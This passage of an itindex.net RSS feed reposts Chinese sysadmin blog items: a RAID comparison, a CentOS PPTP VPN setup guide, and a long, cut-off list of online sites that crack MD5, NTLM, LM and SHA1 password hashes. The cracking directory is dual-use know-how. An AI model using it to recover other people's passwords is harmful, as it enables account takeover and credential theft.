 &lt;p&gt;做RAID是为了追求性能，所以一般使用7.2k转或者10k、15k转的硬盘。而市面上主流7.2k硬盘的发热量普遍较大，同时在机箱里放上两块，散热就已经是个问题，更何况是三块。毕竟稳定压倒一切，要是硬盘被烧毁就得不偿失了。况且，有些机箱根本放不下三块硬盘。因此使用硬RAID的稳定性要高一些。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;三、兼容性&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;目前主流的服务器新版操作系统基本都支持软RAID，但是如果操作系统出了问题，软RAID就挂了。硬RAID的兼容性要好很多，万一系统出了问题，做系统维护、数据恢复也方便多了。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;四、安全性&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;软RAID安全性不好，当有一块硬盘损坏时，它不能实现重建的功能，而且它的局限性也很在，而硬RAID有硬盘丢失时，它可以实现重建，以及如果RAID卡损坏时，它可以通过更换RAID卡，实现不丢失数据的功能。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;主板集成RAID与外插RAID卡RAID的区别：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;一、 性能&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;主板集成的RAID，它的性能以及它的速度是通过主板的CPU与内存来实现的，它会占有主板一定的带宽，会影响整机的性能，而外插RAID卡，它本身由自己的CPU和内存，所以它的数据处理大部分都会由自己处理，不会影响主板上的CPU与内存速度，总体看来，外插的RAID卡的RAID要比主板集成的RAID快得多。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;二、 安全性&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;主板集成的RAID它的安全性不能够得到保证，比如：我们用P8SCT主板做一个SATA RAID，不论你做RAID几，它是通过更改主板的BIOS选项做成的，所以一旦主板损坏、主板的CMOS电池掉电、无意更改了主板BIOS的设置都会带来RAID的丢失，通过主板做成的RAID，一旦丢失，将会不能恢复，后果是非常严重的，而外插的RAID卡做成的RAID就不会因为主板损坏、主板的CMOS电池掉电等现象对数据造成影响，所以外插的RAID卡，它的安全性远远大于主板集成的。&lt;/p&gt;
 &lt;p&gt;查看你的硬件支持哪些RAID设备的命令：  &lt;br /&gt;
  &lt;code&gt;dmraid -l&lt;/code&gt;  &lt;br /&gt;
查看多重磁盘信息：  &lt;br /&gt;
  &lt;code&gt;cat /proc/mdstat&lt;/code&gt;  &lt;br /&gt;
  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/dmraid.jpg"&gt;   &lt;img alt="" height="372" src="http://www.ha97.com/wp-content/uploads/2012/06/dmraid.jpg" title="dmraid" width="571"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;结论：在选择用那种RAID形式时，首先根据客户的需求，整机的价位以及这台机器客户最终用于做什么，几种情况而定。硬Raid通过raid卡进行数据交换，占用系统I/O极小，数据的交换与运算都是通过RAID卡来完成的。而软RAID是通过软件模拟RAID子系统来完成数据交换与运算的，需要占用系统I/O，占用系统资源大。本人建议大部分情况使用硬RAID，别用软RAID，除非有特殊情况需要使用软RAID。&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;关于RAID各个级别的原理和图解请参考维基百科如下链接，解说得很好！&lt;/p&gt;
 &lt;p&gt;http://zh.wikipedia.org/wiki/RAID&lt;/p&gt;
 &lt;p&gt;http://en.wikipedia.org/wiki/RAID&lt;/p&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Linux Security UNIX 个人日记 区别</category>
      <guid isPermaLink="true">https://itindex.net/detail/38217-raid-raid</guid>
      <pubDate>Tue, 19 Jun 2012 21:40:20 CST</pubDate>
    </item>
    <item>
      <title>（总结）CentOS 5.x/6.x下安装配置PPTP VPN服务器及常见问题</title>
      <link>https://itindex.net/detail/38134-centos-pptp-vpn</link>
      <description>&lt;p&gt;  &lt;strong&gt;PS：昨天因同事需求，搭建个PPTP VPN服务器做测试，以前搭建过OpenVPN，现在发现其实PPTP VPN搭建更简单，总结一下：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;VPN的英文全称是“Virtual Private Network”，中文翻译是“虚拟专用网络”。虚拟专用网络我们可以把它理解成是虚拟出来的企业内部专线。它可以通过特殊的加密的通讯协议在连接在Internet上的位于不同地方的两个或多个企业内部网之间建立一条专有的通讯线路，就好比是架设了一条专线一样，但是它并不需要真正的去铺设光缆之类的物理线路。这就好比去电信局申请专线，但是不用给铺设线路的费用，也不用购买路由器等硬件设备。VPN技术原是路由器具有的重要技术之一，目前在交换机，防火墙设备或Windows等软件里也都支持VPN功能，  &lt;strong&gt;一句话，VPN的核心就是在利用公共网络建立虚拟私有网。&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;虚拟专用网（VPN）被定义为通过一个公用网络（通常是因特网）建立一个临时的、安全的连接，是一条穿过混乱的公用网络的安全、稳定的隧道。虚拟专用网是对企业内部网的扩展。虚拟专用网可以帮助远程用户、公司分支机构、商业伙伴及供应商同公司的内部网建立可信的安全连接，并保证数据的安全传输。虚拟专用网可用于不断增长的移动用户的全球因特网接入，以实现安全连接；可用于实现企业网站之间安全通信的虚拟专用线路，用于经济有效地连接到商业伙伴和用户的安全外联网虚拟专用网。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;PPTP全称为Point to Point Tunneling Protocol — 点到点隧道协议，是VPN协议中的一种。&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;一、CentOS 5.x/6.x下PPTP VPN服务器安装&lt;/strong&gt;  &lt;br /&gt;
  &lt;br /&gt;
  &lt;strong&gt;1、安装相关软件包&lt;/strong&gt;  &lt;br /&gt;
32位版：  &lt;br /&gt;
  &lt;code&gt;# yum install -y ppp libpcap iptables   &lt;br /&gt;
# wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-2.rhel5.i386.rpm   &lt;br /&gt;
# rpm -ivh pptpd-1.3.4-2.rhel5.i386.rpm&lt;/code&gt;  &lt;br /&gt;
64位版：  &lt;br /&gt;
  &lt;code&gt;# yum install -y ppp libpcap iptables   &lt;br /&gt;
# wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-2.rhel5.x86_64.rpm   &lt;br /&gt;
# rpm -ivh pptpd-1.3.4-2.rhel5.x86_64.rpm&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;2、配置文件编写&lt;/strong&gt;  &lt;br /&gt;
  &lt;strong&gt;①、配置文件/etc/ppp/options.pptpd&lt;/strong&gt;  &lt;br /&gt;
  &lt;code&gt;# mv /etc/ppp/options.pptpd /etc/ppp/options.pptpd.bak   &lt;br /&gt;
# vim /etc/ppp/options.pptpd&lt;/code&gt;  &lt;br /&gt;
输入以下内容：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
name pptpd   &lt;br /&gt;
refuse-pap   &lt;br /&gt;
refuse-chap   &lt;br /&gt;
refuse-mschap   &lt;br /&gt;
require-mschap-v2   &lt;br /&gt;
require-mppe-128   &lt;br /&gt;
proxyarp   &lt;br /&gt;
lock   &lt;br /&gt;
nobsdcomp   &lt;br /&gt;
novj   &lt;br /&gt;
novjccomp   &lt;br /&gt;
nologfd   &lt;br /&gt;
idle 2592000   &lt;br /&gt;
ms-dns 8.8.8.8   &lt;br /&gt;
ms-dns 8.8.4.4&lt;/code&gt;  &lt;br /&gt;
#这里的DNS可以查看服务器本机使用的DNS地址。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;②、配置文件# /etc/ppp/chap-secrets&lt;/strong&gt;  &lt;br /&gt;
  &lt;code&gt;# mv /etc/ppp/chap-secrets /etc/ppp/chap-secrets.bak   &lt;br /&gt;
# vim /etc/ppp/chap-secrets&lt;/code&gt;  &lt;br /&gt;
输入以下内容  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
# Secrets for authentication using CHAP   &lt;br /&gt;
# client        server  secret                  IP addresses   &lt;br /&gt;
myusername   pptpd   mypassword *   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
注：这里的myusername和mypassword即为PPTP VPN的登录用户名和密码， 改成你自己的。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;③、配置文件/etc/pptpd.conf&lt;/strong&gt;  &lt;br /&gt;
  &lt;code&gt;# mv /etc/pptpd.conf /etc/pptpd.conf.bak   &lt;br /&gt;
# vim /etc/pptpd.conf&lt;/code&gt;  &lt;br /&gt;
输入以下内容：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
option /etc/ppp/options.pptpd   &lt;br /&gt;
logwtmp   &lt;br /&gt;
localip 192.168.80.1   &lt;br /&gt;
remoteip 192.168.80.11-30   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
注：为拨入VPN的用户动态分配192.168.80.11～192.168.80.30之间的IP&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;④、配置文件/etc/sysctl.conf&lt;/strong&gt;  &lt;br /&gt;
  &lt;code&gt;# vim /etc/sysctl.conf&lt;/code&gt;  &lt;br /&gt;
修改以下内容：  &lt;br /&gt;
  &lt;code&gt;net.ipv4.ip_forward = 1&lt;/code&gt;  &lt;br /&gt;
保存、退出后执行：  &lt;br /&gt;
  &lt;code&gt;sysctl -p&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;3、启动PPTP VPN 服务器端：&lt;/strong&gt;  &lt;br /&gt;
  &lt;code&gt;# /etc/init.d/pptpd start&lt;/code&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;4、设置iptables规则并重启：&lt;/strong&gt;  &lt;br /&gt;
# vim /etc/sysconfig/iptables  &lt;br /&gt;
加入下列规则：  &lt;br /&gt;
  &lt;code&gt;   &lt;br /&gt;
-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m tcp --dport 1723 -j ACCEPT   &lt;br /&gt;
-A POSTROUTING -s 192.168.80.0/255.255.255.0 -o eth0 -j MASQUERADE   &lt;br /&gt;
&lt;/code&gt;  &lt;br /&gt;
重启防火墙：  &lt;br /&gt;
# /etc/init.d/iptables start&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;二、Win7下PPTP VPN客户端设置&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;步骤不详说了，直接看图：  &lt;br /&gt;
  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/vpn01.jpg"&gt;   &lt;img alt="" height="496" src="http://www.ha97.com/wp-content/uploads/2012/06/vpn01.jpg" title="vpn01" width="632"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/vpn02.jpg"&gt;   &lt;img alt="" height="496" src="http://www.ha97.com/wp-content/uploads/2012/06/vpn02.jpg" title="vpn02" width="632"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/vpn03.jpg"&gt;   &lt;img alt="" height="496" src="http://www.ha97.com/wp-content/uploads/2012/06/vpn03.jpg" title="vpn03" width="632"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/vpn04.jpg"&gt;   &lt;img alt="" height="496" src="http://www.ha97.com/wp-content/uploads/2012/06/vpn04.jpg" title="vpn04" width="632"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/vpn05.jpg"&gt;   &lt;img alt="" height="496" src="http://www.ha97.com/wp-content/uploads/2012/06/vpn05.jpg" title="vpn05" width="632"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/vpn06.jpg"&gt;   &lt;img alt="" height="496" src="http://www.ha97.com/wp-content/uploads/2012/06/vpn06.jpg" title="vpn06" width="632"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;a href="http://www.ha97.com/wp-content/uploads/2012/06/vpn07.jpg"&gt;   &lt;img alt="" height="496" src="http://www.ha97.com/wp-content/uploads/2012/06/vpn07.jpg" title="vpn07" width="632"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;PPTP VPN服务器接入常见问题总结：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;1、VPN客户端拨入时出现721错误：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;这种情况大数多原因为客户系统，如果为WINXP并且安装了SP2，则可能会出现这种情况，解决方法为：修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\，其中其中 是 WAN 微型端口 (PPTP) 驱动程序的网络适配器，在此项中新建一个DWORD 值ValidateAddress，然后设置为0即可。  &lt;br /&gt;
服务器端PPP协议配置不正确也会导致此类错误。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;2、VPN客户端拨入时出现800错误：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;这种情况大数多原因为客户系统连接服务器时使用域名，因临时DNS无法解析而出现这种错误，可更换DNS试一下，如果还是出错此类错误，则可能是无法连接到VPN服务器，可能是VPN服务器关闭或出现故障，也可能是客户电脑上的防火墙阻止了VPN连接请求，可关闭防火墙试一下。  &lt;br /&gt;
有些使用中转服务器连接到VPN服务器的客户端，也可能出现此类错误，原因为中转服务器中转功能出现故障。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;3、VPN客户端拨入时出现619错误：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;这种情况大数多原因为客户机连接Internet的网关（如家庭宽带路由或公司上网网关路由或防火墙）NAT-T功能关闭或对VPN支持性不好，主要是对GRE及PPTP协议的NAT-T不支持。可打开网关路由的NAT-T功能，如果还是出现错误，则需要更换网关设备，现在市面上大多数设备已经支持。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;4、VPN客户端拨入时出现691错误：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;这种情况大数多原因为客户机连接VPN服务器异常中断，因多数服务器限制一个帐户同时只有一个人使用，所以一旦异常断开，则需等待3分钟左右。有些VPN服务器没有设置异常断线检查功能也可能导致用户一旦异常断开后很长时间不能连接。所以解决办法为在服务器上设置异常断线检查程序或功能。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;5、VPN客户端拨入时出现733错误：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;这种情况大数多原因为客户机拨入VPN服务器后无法获取IP地址，可修复DHCP服务器或设置静态IP地址或地址池。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;6、VPN客户端拨入时出现734 ppp链接控制协议终止：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;这种情况多数为VPN服务器配置有问题，如果是PPP配置有问题，不支持MPPE加密或支持度不好。请重新编译PPP及MPPE相关程序。对于用于游戏代理的用户，可不使用加密（需在服务器端不要求加密）。&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;7、VPN客户端拨入时出现718错误：&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;拨入时用户名和密码出错误，有时也因为服务器端认证服务出现故障。&lt;/p&gt;
&lt;div&gt; &lt;a href="https://itindex.net/"  title="IT 资讯"&gt;&lt;img src="https://itindex.net/images/iconWarning.gif" title="IT 资讯" border="0"/&gt; &lt;/a&gt;</description>
      <category>Linux RHEL/CentOS/Fedora Security 个人日记 centos</category>
      <guid isPermaLink="true">https://itindex.net/detail/38134-centos-pptp-vpn</guid>
      <pubDate>Fri, 15 Jun 2012 10:11:36 CST</pubDate>
    </item>
    <item>
      <title>国外hash（MD5、NTLM、LM、SHA）密码在线破解网站</title>
      <link>https://itindex.net/detail/39497-hash-md5-ntlm</link>
      <description>&lt;p&gt;  &lt;strong&gt;PS：这是国外的hash密码在线破解网站列表，支持多种类型的hash密码，目前可查询破解的hash包括：MD5、NTLM、LM、SHA1、SHA 256-512、MySQL、WPA-PSK 。&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;MD5&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5decrypter.co.uk/" rel="nofollow" target="_blank"&gt;MD5Decrypter(uk)&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://plain-text.info/add/" rel="nofollow" target="_blank"&gt;Plain-Text&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://crackfoo.nicenamecrew.com/" rel="nofollow" target="_blank"&gt;Crackfoo -NNC&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://hashcrack.com/index.php" rel="nofollow" target="_blank"&gt;Hashcrack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://gdataonline.com/seekhash.php" rel="nofollow" target="_blank"&gt;Gdata&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5this.com/crack-it-/index.php" rel="nofollow" target="_blank"&gt;MD5this&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5crack.com/" rel="nofollow" target="_blank"&gt;MD5crack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.noisette.ch/index.php" rel="nofollow" target="_blank"&gt;Noisette&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.joomlaaa.com/md5-coding-decoding" rel="nofollow" target="_blank"&gt;Joomlaaa&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.igrkio.info/md5-hash-database.html" rel="nofollow" target="_blank"&gt;Igrkio&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5decrypter.com/" rel="nofollow" target="_blank"&gt;MD5decrypter&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.shell-storm.org/md5/" rel="nofollow" target="_blank"&gt;Shell-Storm&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.netmd5crack.com/cracker/" rel="nofollow" target="_blank"&gt;NetMD5crack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://xmd5.org/" rel="nofollow" target="_blank"&gt;XMD5&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.thekaine.de/" rel="nofollow" target="_blank"&gt;TheKaine&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://hash.insidepro.com/" rel="nofollow" target="_blank"&gt;InsidePro&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5pass.info/" rel="nofollow" target="_blank"&gt;MD5pass&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://generuj.pl/" rel="nofollow" target="_blank"&gt;Generuj&lt;/a&gt;  &lt;br /&gt;
  &lt;br /&gt;
  &lt;a href="http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php" rel="nofollow" target="_blank"&gt;AuthSecu&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5decryption.com/" rel="nofollow" target="_blank"&gt;MD5decryption&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://schwett.com/md5/" rel="nofollow" target="_blank"&gt;Schwett&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://crackfor.me/" rel="nofollow" target="_blank"&gt;Crackfor.me&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5-db.de/" rel="nofollow" target="_blank"&gt;MD5-db&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.drasen.net/" rel="nofollow" target="_blank"&gt;Drasen&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.gromweb.com/" rel="nofollow" target="_blank"&gt;Gromweb&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5hood.com/" rel="nofollow" target="_blank"&gt;MD5hood&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php" rel="nofollow" target="_blank"&gt;MD5.my-addr&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5online.net/" rel="nofollow" target="_blank"&gt;MD5online&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.macrosoftware.ro/md5/" rel="nofollow" target="_blank"&gt;Macrosoftware&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://bokehman.com/cracker/" rel="nofollow" target="_blank"&gt;Bokehman&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5-decrypter.com/" rel="nofollow" target="_blank"&gt;MD5-decrypter&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.thoran.eu/cracker" rel="nofollow" target="_blank"&gt;Thoran&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.c0llision.net/webcrack.php" rel="nofollow" target="_blank"&gt;C0llision&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.rednoize.com/" rel="nofollow" target="_blank"&gt;Rednoize&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.web-security-services.com/password-decoding.php" rel="nofollow" target="_blank"&gt;web-security-services&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5-lookup.com/" rel="nofollow" target="_blank"&gt;MD5-lookup&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.cmd5.org/" rel="nofollow" target="_blank"&gt;CMD5&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://tmto.org/" rel="nofollow" target="_blank"&gt;Tmto&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.shalla.de/cgi-bin/search.cgi" rel="nofollow" target="_blank"&gt;Shalla&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.hash-database.net/" rel="nofollow" target="_blank"&gt;Hash-Database&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://bokehman.com/cracker/" rel="nofollow" target="_blank"&gt;Bokehman&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://tools.benramsey.com/md5/" rel="nofollow" target="_blank"&gt;Benramsey&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.digitalsun.pl/" rel="nofollow" target="_blank"&gt;Digitalsun&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://cracker.kalkulators.org/" rel="nofollow" target="_blank"&gt;Kalkulators&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.stringfunction.com/md5-decrypter.html" rel="nofollow" target="_blank"&gt;StringFunction&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://hash.toolz.in/" rel="nofollow" target="_blank"&gt;Toolz&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://cracker.fox21.at/" rel="nofollow" target="_blank"&gt;Fox21&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.gat3way.eu/crack/search.php" rel="nofollow" target="_blank"&gt;Gat3way&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://isc.sans.edu/tools/reversehash.html" rel="nofollow" target="_blank"&gt;Sans&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5hashcracker.appspot.com/" rel="nofollow" target="_blank"&gt;Appspot&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="https://hashcracking.ru/index.php" rel="nofollow" target="_blank"&gt;HashCracking.ru&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://anqel.pl/narzedzia/md5/md5search.php" rel="nofollow" target="_blank"&gt;Anqel&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://cracker.offensive-security.com/" rel="nofollow" target="_blank"&gt;Offensive-Security&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md51.altervista.org/" rel="nofollow" target="_blank"&gt;Altervista&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://xanadrel.99k.org/hashes/index.php" rel="nofollow" target="_blank"&gt;Xanadrel&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://beeeer.org/hash/" rel="nofollow" target="_blank"&gt;Beeeer&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.kinginfet.net/md5_cracker/" rel="nofollow" target="_blank"&gt;Kinginfet&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://askcheck.com/" rel="nofollow" target="_blank"&gt;AskCheck&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.hash-cracker.com/index.php" rel="nofollow" target="_blank"&gt;hash-cracker.com&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://agilobable.pl/hash/szukaj.php" rel="nofollow" target="_blank"&gt;agilobable.pl&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5finder.com/" rel="nofollow" target="_blank"&gt;MD5finder&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://wordd.org/" rel="nofollow" target="_blank"&gt;Wordd&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5rainbow.com/" rel="nofollow" target="_blank"&gt;MD5Rainbow&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;(IRC Bots)  &lt;br /&gt;
  &lt;a href="http://www.md5.overclock.ch/index.php?p=md5crk&amp;l=en" rel="nofollow" target="_blank"&gt;Overclock&lt;/a&gt;  &lt;br /&gt;
plain-text.info (irc.Plain-Text.info #rainbowcrack – irc.rizon.net #rainbowcrack)  &lt;br /&gt;
md5.overclock.ch (irc.rizon.net #md5)  &lt;br /&gt;
c0llision.net (irc.after-all.org #md5crack – ircd.hopto.org #md5crack – ix.dal.net #md5crack)&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;NTLM&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5decrypter.co.uk/" rel="nofollow" target="_blank"&gt;MD5decrypter(uk)&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://plain-text.info/add/" rel="nofollow" target="_blank"&gt;Plain-Text&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://crackfoo.nicenamecrew.com/" rel="nofollow" target="_blank"&gt;NiceNameCrew&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://hashcrack.com/index.php" rel="nofollow" target="_blank"&gt;HashCrack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://tmto.org/" rel="nofollow" target="_blank"&gt;Tmto&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://cracker.fox21.at/" rel="nofollow" target="_blank"&gt;Fox21&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.lmcrack.com/" rel="nofollow" target="_blank"&gt;LMCrack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.hash-cracker.com/index.php" rel="nofollow" target="_blank"&gt;hash-cracker.com&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;LM&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://plain-text.info/add/" rel="nofollow" target="_blank"&gt;Plain-Text&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://crackfoo.nicenamecrew.com/" rel="nofollow" target="_blank"&gt;NiceNameCrew&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://hashcrack.com/index.php" rel="nofollow" target="_blank"&gt;HashCrack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.c0llision.net/webcrack.php" rel="nofollow" target="_blank"&gt;C0llision&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://tmto.org/" rel="nofollow" target="_blank"&gt;Tmto&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://cracker.fox21.at/" rel="nofollow" target="_blank"&gt;Fox21&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.lmcrack.com/" rel="nofollow" target="_blank"&gt;LMCrack&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://cracker.offensive-security.com/" rel="nofollow" target="_blank"&gt;Offensive-Security&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;  &lt;strong&gt;SHA1&lt;/strong&gt;  &lt;br /&gt;
  &lt;a href="http://www.md5decrypter.co.uk/" rel="nofollow" target="_blank"&gt;MD5Decrypter(uk)&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://md5.rednoize.com/" rel="nofollow" target="_blank"&gt;Rednoize&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.web-security-services.com/password-decoding.php" rel="nofollow" target="_blank"&gt;Web-Security-Services&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.sha1-lookup.com/" rel="nofollow" target="_blank"&gt;SHA1-Lookup&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.cmd5.org/" rel="nofollow" target="_blank"&gt;CMD5&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://tmto.org/" rel="nofollow" target="_blank"&gt;Tmto&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://www.hash-database.net/" rel="nofollow" target="_blank"&gt;Hash-Database&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://hash.toolz.in/" rel="nofollow" target="_blank"&gt;Toolz&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://isc.sans.edu/tools/reversehash.html" rel="nofollow" target="_blank"&gt;Sans&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="https://hashcracking.ru/index.php" rel="nofollow" target="_blank"&gt;HashCracking.ru&lt;/a&gt;  &lt;br /&gt;
  &lt;a href="http://askcheck.com/" rel="nofollow" target="_blank"&gt;AskCheck&lt;/a&gt;  &lt;br /&gt;
